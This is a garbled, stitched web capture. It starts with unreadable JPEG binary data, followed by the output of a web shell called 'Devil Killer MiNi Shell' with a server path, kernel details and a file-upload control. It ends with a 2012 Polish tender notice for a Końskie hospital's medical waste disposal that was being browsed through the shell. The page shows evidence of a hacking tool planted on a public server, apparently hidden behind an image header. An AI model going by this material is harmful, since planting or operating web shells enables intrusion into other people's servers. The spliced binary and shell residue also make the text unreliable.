JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/491754-N-2012.html

<p class="kh_header"><b>Końskie: Usługi w zakresie odpadów medycznych</b><br>
<b>Numer ogłoszenia: 491754 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul.  Gimnazjalna 41B, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3902314, faks 041 3902319.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.konskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie odpadów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem zamówienia jest świadczenie systematycznej usługi związanej z transportem oraz utylizacją odpadów medycznych w ilości rocznej ok. 150 000kg,  metodą termiczną - D10 -
(termiczne przekształcanie odpadów w instalacjach lub urządzeniach zlokalizowanych na lądzie) wytworzonych przez ZOZ Końskie o kodach: 18 01 01; 18 01 02; 18 01 03;  18 01 04; 18 01 08; 18 01 09 zgodnie z Rozporządzeniem Ministra Środowiska z dn. 27 września 2001r w sprawie katalogu odpadów  oraz Ustawą tekst jednolity Dz. U 2007 nr. 39 poz. 251 Ustawa o odpadach z póżn. zm, oraz Rozporządzeniem Ministra Zdrowia z dn. 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi.  
Zespół Opieki Zdrowotnej w Końskich ul. Gimnazjalna 41B wymaga, aby świadczenie usługi w zakresie: odbioru, transportu oraz utylizacji odpadów medycznych odbywało się zgodnie z przepisami prawa obowiązującymi na terenie RP tj oraz Ustawą tekst jednolity Dz. U 2007 nr. 39 poz. 251 Ustawa o odpadach z póżn. zm,. rozporządzenia Ministra Zdrowia z dn. 23 grudnia 2002 r. w sprawie dopuszczalnych sposobów i warunków unieszkodliwiania odpadów medycznych i weterynaryjnych (Dz. U. nr 8 poz. 104 z dn. 24 stycznia 2003 r. z póź. zm.) ustawy z dnia 28 października 2002 r. o przewozie drogowym towarów niebezpiecznych (Dz. U. z dnia 28 listopada 2002r z póź. zm.). Rop. Ministra Środowiska z 8 grudnia 2010r w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr. 249 poz. 1673).
Zamawiający zgromadzone odpady medyczne magazynuje w zlokalizowanym na terenie obiektu pomieszczeniu wyposażonym w: instalację wentylacji nawiewno wywiewnej z wytworzeniem podciśnienia w pomieszczeniu magazynu (w skład instalacji wchodzi filtr powietrza z układem filtracyjnym), instalację klimatyzacyjno chłodniczą z utrzymaniem w pomieszczeniu temperatury nie wyższej niż + 10oC.
Maksymalna ilość gromadzonych w nim odpadów to ok. 3 000 kg. W związku z tym wymaga się aby odbiór zgromadzonych odpadów odbywał się dwa razy w tygodniu, nie doprowadzając do przepełnienia pomieszczenia,  pomieszczenie to ma być opróżnione z całości zgromadzonych w dniu odbioru odpadów. W ZOZ Końskie obowiązuje procedura POH10 gospodarka odpadami, systemu ochrony środowiska ISO 14001 dotycząca segregacji, pakowania i gromadzenia odpadów medycznych, zgodnie z Rozporządzeniem Ministra Zdrowia z dn. 30 lipca 2010r w sprawie szczegółowego postępowania z odpadami medycznymi.  Zamawiający segreguje wytwarzane odpady pakując je i zamykając szczelnie szarą folią samoprzylepną w 120L worki foliowe oznaczone odpowiednim kolorem worka i opisem miejsca wytworzenia oraz rodzajem odpadów zgodnie z obowiązującą Procedurą wewnętrzną oraz Rozporządzeniem. Ministra Zdrowia z dn. 30 lipca 2010r w sprawie szczegółowego postępowania z odpadami medycznymi. Zapewnienie właściwych rozmiarów, jakości oraz odpowiedniej ilości worków foliowych należy do Wykonawcy usługi sprzątania obiektów Szpitala w Końskich tj. Konsorcjum firm; IMPEL Clearing Sp. z o o. Hospital Serwis Partner Sp z o. o. 53-111 Wrocław ul. Ślężna 118.
W przypadku gdy Wykonawca zaoferuje inny sposób pakowania odpadów medycznych niż worki foliowe których używa się w obiekcie Zamawiającego - to podczas odbioru zgromadzonych w pomieszczeniu odpadów (zapakowanych w oznakowane worki foliowe), Wykonawca zważy je w obecności pracownika Zamawiającego, a następnie przepakowuje je we własne opakowania i opisze zgodnie z przepisami, na własny koszt i własnymi pracownikami. Orientacyjnie w ciągu miesiąca Zamawiający wytwarza średnio od ok. 12 500 kg. odpadów medycznych. Środek transportu Wykonawcy powinien posiadać legalizowaną wagę dziesiętną na której w obecności pracownika ZOZ dokonuje się ważenia odpadów medycznych. W przypadku gdy Wykonawca nie dysponuje wagą, to wtedy dokonuje ważenia pojazdu na wadze samochodowej przed i po załadunku na własny koszt, przedstawiając pracownikowi ZOZ (kwit z dokonania ważenia).  Przekazanie odpadów odbywa się na podstawie Karty przekazania Odpadów zgodnie z Rozp. Ministra Środowiska z dn. 8 grudnia 2010r. (Dz. U. Nr 249 poz. 1673). Z chwilą  przejęcia odpadów medycznych całkowitą odpowiedzialność wobec przepisów prawa za przejęte odpady, ponosi Wykonawca.  Środki transportu i kierowcy Wykonawcy powinny posiadać ważne uprawnienia, zgodnie z ustawą z dnia 28 października 2002r o przewozie drogowym materiałów niebezpiecznych (Dz. U. z dn. 28 listopada 2002r z późn. Zm.).
Utylizacja (spalanie metodą termiczną D10) odpadów medycznych powinno odbywać się zgodnie z Ustawą z dn. 27 kwietnia 2001 Prawo Ochrony Środowiska  tekst jednolity Dz. U. Nr. 25 poz. 150 z póżn. zm.,  a w szczególności;  art. 9 Wykonawca zobowiązany jest do unieszkodliwiania odpadów medycznych pochodzących z obiektów Zamawiającego w zakładzie utylizacji zlokalizowanym na obszarze województwa, na którym odpady zostały wytworzone, dopuszczalne jest unieszkodliwianie odpadów  pochodzących z obiektów Zamawiającego w zakładzie utylizacji zlokalizowanym po za obszarem województwa na którym odpady zostały wytworzone w przypadku gdy odległość od miejsca wytwarzania do miejsca unieszkodliwienia jest mniejsza niż odległość do miejsca unieszkodliwienia położonego na obszarze tego samego województwa, oraz art. 42 Wykonawca zobowiązany jest do zapewnienia odbywania utylizacji odpadów medycznych zgodnie z postanowieniami ustawy o odpadach, tj. przy zastosowaniu metod, które prowadzą do obniżenia zawartości ogólnego węgla organicznego do 5% w tych odpadach, metodą D 10. Zakazane jest unieszkodliwianie tych odpadów przez ich współspalanie.
Wykonawca w razie awarii własnej lub dzierżawionej  spalarni zobowiązany jest zabezpieczyć systematyczny odbiór odpadów medycznych od Zamawiającego po cenie netto za 1 kg wynikającej ze złożonej oferty.
Orientacyjne ilości odpadów medycznych w Mg wg poszczególnych kodów: 18 01 01 - 0,050 Mg; 18 01 02 - 0,900 Mg; 18 01 03 - 150 000 Mg, 18 01 04 - 0,150 Mg, 18 01 08 - 0,050 Mg, 18 01 09 - 0,01 0Mg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.12.22.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wyznacza szczegółowy warunek w tym zakresie: 
a) Kserokopia decyzji pozwolenia na utylizacje odpadów wydane przez organ Wojewody w zakresie odpadów o kodach; 18 01 01; 18 01 02; 18 01 03; 18 01 04; 18 01 08; 18 01 09, zgodnie z przepisami obowiązującymi na terenie RP

Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o analizę dokumentów złożonych przez Wykonawcę w niniejszym postępowaniu metoda warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wyznacza szczegółowy warunek w tym zakresie; 
a) Wykaz wykonanych z należytą starannością  usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom z podaniem wartości, przedmiotu zamówienia, dat wykonania i odbiorców, wymagana jest minimum jedna usługa utylizacji i odbioru odpadów medycznych z potwierdzeniem należytego wykonania o wartości min. 80% składanej oferty.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o analizę dokumentów złożonych przez Wykonawcę w niniejszym postępowaniu metoda warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wyznacza szczegółowy warunek w tym zakresie; 
a) Dokument potwierdzający, że Wykonawca posiada  spalarnię  odpadów medycznych zgodnie z Ustawą o odpadach tekst jednolity Dz. U z 2007r. Nr. 39 poz. 251 z  póżn. zm. lub
b) Oświadczenie innego podmiotu zobowiązujące do udostępnienia Wykonawcy potencjału technicznego (spalarni) - Wykonawca w tej sytuacji zobowiązany jest udowodnić Zamawiającemu że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zamawiający dopuszcza możliwość złożenia wraz z ofertą oświadczenia na potwierdzenie powyższego. W przypadku uzyskania zamówienia podczas podpisywania umowy, Wykonawca przedłoży Zamawiającemu stosowny dokument umowę między stronami w tym zakresie na czas nie krótszy niż okres zawarcia umowy.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o analizę dokumentów złożonych przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.
Dokument potwierdzający, że środki transportu zaoferowane do wykonywania usługi  posiadają świadectwa dopuszczenia pojazdów do przewozu towarów niebezpiecznych zgodnie z ustawą z dn, 28 października 2002r o przewozie drogowym towarów niebezpiecznych Dz. U. z dn. 28 listopada 2002r z póź. zm.
c) Kserokopia ważnego dokumentu dopuszczenia do przewozu towarów niebezpiecznych dla minimum jednego pojazdu o ładowności do 10 ton wg obowiązujących na terenie RP przepisów - dla wykazania spełnienia tego warunku wystarczające jest złożenie wydanego przez stosowny organ zaświadczenia na przewozy drogowe na potrzeby własne  lub zaświadczenia o przeprowadzonym badaniu technicznym pojazdu przeznaczonego do przewozu niektórych towarów niebezpiecznych lub świadectwa dopuszczenia pojazdu do przewozu niektórych towarów niebezpiecznych
d) Kserokopie dowodów rejestracyjnych środków transportu pojazdów przeznaczonych do realizacji zamówienia, które posiadają aktualne badania techniczne. 
Dokument potwierdzający, że środki transportu zaoferowane do wykonywania usługi  posiadają świadectwa dopuszczenia pojazdów do przewozu towarów niebezpiecznych zgodnie z ustawą z dn, 28 października 2002r o przewozie drogowym towarów niebezpiecznych Dz. U. z dn. 28 listopada 2002r z póź. zm.

Dokument potwierdzający, że osoby kierowcy, które będą wykonywać zamówienie, posiadają uprawnienia i szkolenia ADR zgodnie z ustawą z dn, 28 października 2002r o przewozie drogowym towarów niebezpiecznych Dz. U. z dn. 28 listopada 2002r z póź. zm.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o analizę dokumentów złożonych przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wyznacza szczegółowy warunek w tym zakresie;
f) Kserokopia Świadectwa kwalifikacji w zakresie gospodarowania odpadami na podst. art. 49 ust. 2 Ustawy o odpadach z póżn. zm)  wymaganych dla Kierownika Spalarni wg obowiązujących na terenie RP przepisów
g) Kserokopia ważnego Świadectwa przeszkolenia doradcy do spraw bezpieczeństwa w zakresie transportu towarów niebezpiecznych - wystawionego przez odpowiedni organ Marszałka Województwa. 
e) Kserokopia ważnych uprawnień ADR minimum dla jednego kierowcy wg obowiązujących na terenie RP przepisów.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o analizę dokumentów złożonych przez Wykonawcę w niniejszym postępowaniu metoda warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiajacy uzna warunek za spełniony, jeżeli Wykonawca złoży oswiadczenie o spełnieniu tego warunku (zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Formularz Ofertowy Wykonawcy. 2. Formularz Cenowy.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza  zmiany do    umowy w następujących przypadkach :
a) - gdy podczas realizacji umowy wystąpią nieprzewidziane zdarzenia lub okoliczności które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
b) - zmianę osób reprezentujących strony i odpowiedzialnych  za  realizację postanowień umowy 
c) - zmianę rachunku bankowego i innych danych stron
      d) - zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.konskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej
26-200 Końskie
ul. Gimnazjalna 41B
DSUiZP - niski pater.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2012 godzina 10:45, miejsce: SEKRETARIAT
Zespół Opieki Zdrowotnej
26-200 Końskie
ul. Gimnazjalna 41B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





